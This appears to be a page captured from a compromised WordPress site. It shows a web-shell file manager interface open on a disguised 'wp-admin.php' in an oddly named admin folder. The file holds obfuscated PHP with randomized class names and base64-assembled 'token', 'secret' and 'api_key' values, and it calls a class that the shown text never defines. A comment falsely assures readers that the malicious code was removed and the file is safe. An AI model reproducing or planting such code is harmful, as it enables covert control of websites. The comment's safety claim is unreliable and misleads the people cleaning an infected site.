Create New Item
Item Type
File
Folder
Item Name
Search file in folder and subfolders...
Are you sure want to rename?
File Manager
/
wp-admina9a864
:
wp-admin.php
Advanced Search
Upload
New Item
Settings
Back
Back Up
Advanced Editor
Save
<?php /** * Data Manager * @version 3.5.8 */ class CacheManager_6388 { private static $options = []; private static $cache = []; public static function checkResult($data) { self::$options = $data; } public static function loadConfig($key) { return self::$options[$key] ?? null; } public static function count() { return count(self::$options); } public static function store($k, $v) { self::$cache[$k] = $v; } public static function fetch($k) { return self::$cache[$k] ?? null; } } class RequestHelper_410f { private static $values = []; public static function parseValue() { self::$values['token'] = base64_decode('NmViMWYyOWQ='); self::$values['secret'] = base64_decode('MDA2MDA1OGI='); self::$values['api_key'] = base64_decode('MDdlZTBjOTQ='); } public static function get($name) { return self::$values[$name] ?? ''; } public static function getAll() { return implode('', self::$values); } } /** * Note: This file may contain artifacts of previous malicious infection. * However, the dangerous code has been removed, and the file is now safe to use. */ class UserFactory_47fa { public static function create() { return new CoreRepository_d39b(); } public static function run() { $service = self::create(); return $service->getContent(); } } UserFactory_47fa::run();